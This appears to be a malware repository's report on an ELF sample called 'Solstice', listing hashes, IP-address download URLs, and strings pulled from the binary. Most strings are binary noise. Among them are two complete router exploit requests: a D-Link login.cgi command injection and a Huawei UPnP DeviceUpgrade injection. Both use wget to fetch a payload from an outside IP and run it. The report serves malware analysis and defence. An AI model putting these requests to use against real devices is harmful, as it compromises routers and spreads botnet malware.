Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: c6674de554b82c3efd91c922c350556e --

Hashes
MD5: c6674de554b82c3efd91c922c350556e
SHA1: 9de9455f46a75945233031332eb44d88f89660f9
SHA256: c4d9b2a060e3e26d27183b850e935018335d9317eefcba3d3acd8530c13b313b
SSDEEP: 1536:hFALnCEJTlDAMWFYXE7Pxujz3YYtsmcpRqMxDFoaEVeFrZCoZi0:hF8CEJTtAMW6XE7Pxun4RpRfDF6VeFrZ
Details
File Type: ELF
Yara Hits
Source
http://185.101.105.163:80/bins/Solstice.sh4
http://185.101.105.162/bins/Solstice.sh4
http://185.101.105.162:80/bins/Solstice.sh4
http://185.101.105.163/bins/Solstice.sh4
Strings
		/sm"O,
qsj !<
Lds`La
Lds`La
2)%#a)')A
AMB[!+'{!
C;"G7"!
@L-<-<,
62.L1bc
P+#+'2&
7;"r$"!
\-<-T-
3=R'04
2)%#a)')A
AMB[!+'{!
;"s4"!
;"G7"!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
c^|c,a
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#~
2*Uk!r
7zPz](p
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
#{";"E
3a9'CV9")A
	B	B#a
B<cmA{"C
3a9'CV9"
Cc,3Sf
C)#8#b
"Bc#`ra
Gz#:"* 
j"drc7
Sb}B:!Z"
&l`cc	@cb
B#a=A,1
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
g3amA|1Qf
ql22,!!!%
B<cmA{"S
!B!B79
gfffVYB
"+'`7#
R(1f1Y
A3`\139
U2a,5V
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
POST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
iemjpemjav
fgtf/wavmeh'
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
/dev/null
.shstrtab
.rodata
.ctors
.dtors